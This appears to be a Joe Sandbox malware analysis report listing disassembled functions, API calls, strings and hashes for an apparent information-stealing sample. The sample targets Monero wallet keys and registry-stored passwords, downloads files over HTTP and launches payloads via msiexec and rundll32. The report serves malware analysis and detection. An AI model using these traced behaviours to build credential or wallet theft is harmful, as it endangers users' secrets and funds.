                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteShell$lstrcpy
                                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                      • API String ID: 2507796910-3625054190
                                      • Opcode ID: 7b54bfdaa8c39128a7994bda412f36a02b80ac47492346df98f86680b69bf2b6
                                      • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                      • Opcode Fuzzy Hash: 7b54bfdaa8c39128a7994bda412f36a02b80ac47492346df98f86680b69bf2b6
                                      • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                                      APIs
                                      • lstrcpy.KERNEL32(?,?), ref: 022E1642
                                        • Part of subcall function 022E9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022E9072
                                        • Part of subcall function 022E94C7: StrStrA.SHLWAPI(?,?), ref: 022E94D3
                                      • lstrcpy.KERNEL32(?,00000000), ref: 022E167E
                                        • Part of subcall function 022E94C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 022E94F7
                                        • Part of subcall function 022E94C7: lstrlen.KERNEL32(?), ref: 022E950E
                                        • Part of subcall function 022E94C7: wsprintfA.USER32 ref: 022E952E
                                      • lstrcpy.KERNEL32(?,00000000), ref: 022E16C6
                                      • lstrcpy.KERNEL32(?,00000000), ref: 022E170E
                                      • lstrcpy.KERNEL32(?,00000000), ref: 022E1755
                                      • lstrcpy.KERNEL32(?,00000000), ref: 022E179D
                                      • lstrcpy.KERNEL32(?,00000000), ref: 022E17E5
                                      • lstrcpy.KERNEL32(?,00000000), ref: 022E182C
                                      • lstrcpy.KERNEL32(?,00000000), ref: 022E1874
                                        • Part of subcall function 022EAA87: lstrlen.KERNEL32(022D516C,?,?,022D516C,00420DDE), ref: 022EAA92
                                        • Part of subcall function 022EAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022EAAEC
                                      • strtok_s.MSVCRT ref: 022E19B7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                      • String ID: l
                                      • API String ID: 4276352425-1524257125
                                      • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                      • Instruction ID: 4158661848786d2b51a9c44eb49494a0d5e03b6db320aeb1cc2c92dc8bf085f8
                                      • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                      • Instruction Fuzzy Hash: AE7165B5960218ABCF14EBE0DC88EEE737AAF55300F444599A10FA2144EE755B84DF61
                                      APIs
                                      • memset.MSVCRT ref: 00401327
                                        • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                        • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                        • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                        • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                        • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                      • lstrlenA.KERNEL32(?), ref: 0040135C
                                      • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00689760,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                        • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                        • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                        • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                        • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                        • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                      • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                      • memset.MSVCRT ref: 00401516
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                      • API String ID: 1930502592-218353709
                                      • Opcode ID: 1ffaf8d4d6c2a3481fec365c2b0764f9c655753230e8ae66aea782baa7a8bf5d
                                      • Instruction ID: 674d48b949cffd92695f0a4f51b6d393b2dd06dcaa63b8f6d50fb5eb71b8da29
                                      • Opcode Fuzzy Hash: 1ffaf8d4d6c2a3481fec365c2b0764f9c655753230e8ae66aea782baa7a8bf5d
                                      • Instruction Fuzzy Hash: AA5164B195011897CB15FB61DD91BED733CAF54304F4041ADB60A62091EE385BDACBAA
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                        • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,006C0DE0), ref: 00406303
                                        • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                        • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,006C04D0,00000000,00000000,00400100,00000000), ref: 00406385
                                        • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                        • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                      • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                        • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                      • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                      • lstrlenA.KERNEL32(00000000), ref: 00415383
                                      • strtok.MSVCRT(00000000,?), ref: 0041539E
                                      • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 3532888709-1526165396
                                      • Opcode ID: 8853f5c5da968409b6cbaba164f86e7b859f398aed1122ab08fb9db45a23fc41
                                      • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                      • Opcode Fuzzy Hash: 8853f5c5da968409b6cbaba164f86e7b859f398aed1122ab08fb9db45a23fc41
                                      • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                      APIs
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                      • memset.MSVCRT ref: 022E0E83
                                      • lstrcat.KERNEL32(?,00000000), ref: 022E0E9C
                                      • lstrcat.KERNEL32(?,00420D7C), ref: 022E0EAE
                                      • lstrcat.KERNEL32(?,00000000), ref: 022E0EC4
                                      • lstrcat.KERNEL32(?,00420D80), ref: 022E0ED6
                                      • lstrcat.KERNEL32(?,00000000), ref: 022E0EEF
                                      • lstrcat.KERNEL32(?,00420D84), ref: 022E0F01
                                      • lstrlen.KERNEL32(?), ref: 022E0F0E
                                      • memset.MSVCRT ref: 022E0F34
                                      • memset.MSVCRT ref: 022E0F48
                                        • Part of subcall function 022EAA87: lstrlen.KERNEL32(022D516C,?,?,022D516C,00420DDE), ref: 022EAA92
                                        • Part of subcall function 022EAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022EAAEC
                                        • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                        • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                        • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                        • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                        • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                        • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                        • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                        • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                        • Part of subcall function 022E9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,022E0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 022E9948
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 022E0FC1
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 022E0FCD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                      • String ID:
                                      • API String ID: 1395395982-0
                                      • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                      • Instruction ID: bb69edd30aa5c02f11f638149630c00747a39274ea46de07c3087315323c12c5
                                      • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                      • Instruction Fuzzy Hash: 738180B5920318ABCF14EBE0DD91FED733AAF54304F804199A30B66185EE746B88DF59
                                      APIs
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                      • memset.MSVCRT ref: 022E0E83
                                      • lstrcat.KERNEL32(?,00000000), ref: 022E0E9C
                                      • lstrcat.KERNEL32(?,00420D7C), ref: 022E0EAE
                                      • lstrcat.KERNEL32(?,00000000), ref: 022E0EC4
                                      • lstrcat.KERNEL32(?,00420D80), ref: 022E0ED6
                                      • lstrcat.KERNEL32(?,00000000), ref: 022E0EEF
                                      • lstrcat.KERNEL32(?,00420D84), ref: 022E0F01
                                      • lstrlen.KERNEL32(?), ref: 022E0F0E
                                      • memset.MSVCRT ref: 022E0F34
                                      • memset.MSVCRT ref: 022E0F48
                                        • Part of subcall function 022EAA87: lstrlen.KERNEL32(022D516C,?,?,022D516C,00420DDE), ref: 022EAA92
                                        • Part of subcall function 022EAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022EAAEC
                                        • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                        • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                        • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                        • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                        • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                        • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                        • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                        • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                        • Part of subcall function 022E9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,022E0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 022E9948
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 022E0FC1
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 022E0FCD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                      • String ID:
                                      • API String ID: 1395395982-0
                                      • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                      • Instruction ID: 0f719fcb54180e06364c7099f59309dc57ef029f76345db033b3b98ece3461f4
                                      • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                      • Instruction Fuzzy Hash: B561AEB5520318ABCF14EBE0DD85FED733AAF54304F804199A70B66185EE742B88CF59
                                      APIs
                                        • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                        • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A51
                                        • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A68
                                        • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A7F
                                        • Part of subcall function 022D4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022D4AA0
                                        • Part of subcall function 022D4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022D4AB0
                                      • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 022D6376
                                      • StrCmpCA.SHLWAPI(?,l), ref: 022D63AE
                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 022D63F6
                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 022D641A
                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 022D6443
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 022D6471
                                      • CloseHandle.KERNEL32(?,?,00000400), ref: 022D64B0
                                      • InternetCloseHandle.WININET(?), ref: 022D64BA
                                      • InternetCloseHandle.WININET(00000000), ref: 022D64C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                      • String ID: l
                                      • API String ID: 4287319946-362530722
                                      • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                      • Instruction ID: 587547d62c2b6e8abd2c63fb14d3436c13b1492aa1deaff21fe3c776ead07939
                                      • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                      • Instruction Fuzzy Hash: AF517FB5A60318ABDF20DFE0DC44BEE7779AB44705F408098F605A72C4DBB46A89CF95
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 022E92D3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateGlobalStream
                                      • String ID:
                                      • API String ID: 2244384528-0
                                      • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                      • Instruction ID: 67a4045ee0eb0c53bb6f177a654d3697e84ca9963e2100c7ff82298365760a06
                                      • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                      • Instruction Fuzzy Hash: 6B71FAB9A50208ABDB14DFE4DD84FEEB7BAFF49300F508108F506A7294DB74A944CB61
                                      APIs
                                      • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                      • memset.MSVCRT ref: 0041716A
                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                      Strings
                                      • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                      • sA, xrefs: 00417111
                                      • sA, xrefs: 004172AE, 00417179, 0041717C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: OpenProcesslstrcpymemset
                                      • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                      • API String ID: 224852652-2614523144
                                      • Opcode ID: 6115dca80d6cf9bb482a94d79f66c36139396751b61d0524125d78405d7c6e46
                                      • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                      • Opcode Fuzzy Hash: 6115dca80d6cf9bb482a94d79f66c36139396751b61d0524125d78405d7c6e46
                                      • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                      APIs
                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 022E77A9
                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 022E77E6
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E786A
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 022E7871
                                      • wsprintfA.USER32 ref: 022E78A7
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                      • String ID: :$C$\$B
                                      • API String ID: 1544550907-183544611
                                      • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                      • Instruction ID: b090b413dba251d6d830d90180377f1f9ec6c1da5914251afc695a9631a2d21e
                                      • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                      • Instruction Fuzzy Hash: 6A418EB1D10258ABDF10DFD4CC45BEEBBB9EF58700F400199E506A7280D7756A84DBA6
                                      APIs
                                        • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                        • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                        • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                        • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                        • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                        • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                      • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                      • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                      • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                      • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                      • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                      • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                      • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                      • task.LIBCPMTD ref: 004076FB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                      • String ID: :
                                      • API String ID: 3191641157-3653984579
                                      • Opcode ID: d19bb9034be843adce2da22a5665dbbd0c26fc1f75395a982b8fbed49acf7942
                                      • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                      • Opcode Fuzzy Hash: d19bb9034be843adce2da22a5665dbbd0c26fc1f75395a982b8fbed49acf7942
                                      • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                      APIs
                                        • Part of subcall function 022EAA87: lstrlen.KERNEL32(022D516C,?,?,022D516C,00420DDE), ref: 022EAA92
                                        • Part of subcall function 022EAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022EAAEC
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                      • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 022E58AB
                                      • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 022E5908
                                      • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 022E5ABE
                                        • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                        • Part of subcall function 022E5457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 022E548F
                                        • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                        • Part of subcall function 022E5527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 022E557F
                                        • Part of subcall function 022E5527: lstrlen.KERNEL32(00000000), ref: 022E5596
                                        • Part of subcall function 022E5527: StrStrA.SHLWAPI(00000000,00000000), ref: 022E55CB
                                        • Part of subcall function 022E5527: lstrlen.KERNEL32(00000000), ref: 022E55EA
                                        • Part of subcall function 022E5527: strtok.MSVCRT(00000000,?), ref: 022E5605
                                        • Part of subcall function 022E5527: lstrlen.KERNEL32(00000000), ref: 022E5615
                                      • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 022E59F2
                                      • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 022E5BA7
                                      • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 022E5C73
                                      • Sleep.KERNEL32(0000EA60), ref: 022E5C82
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$Sleepstrtok
                                      • String ID: 8ah
                                      • API String ID: 3630751533-3937853110
                                      • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                      • Instruction ID: e0dad19829b9998260d0b21101c0b68568d91499336cf093027f9cc691bbf922
                                      • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                      • Instruction Fuzzy Hash: FFE1FA71920304AACF18FBE0DD969FD737AAF65300FC08168A50766298EF785B58DF91
                                      APIs
                                      • memset.MSVCRT ref: 00407314
                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                      • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
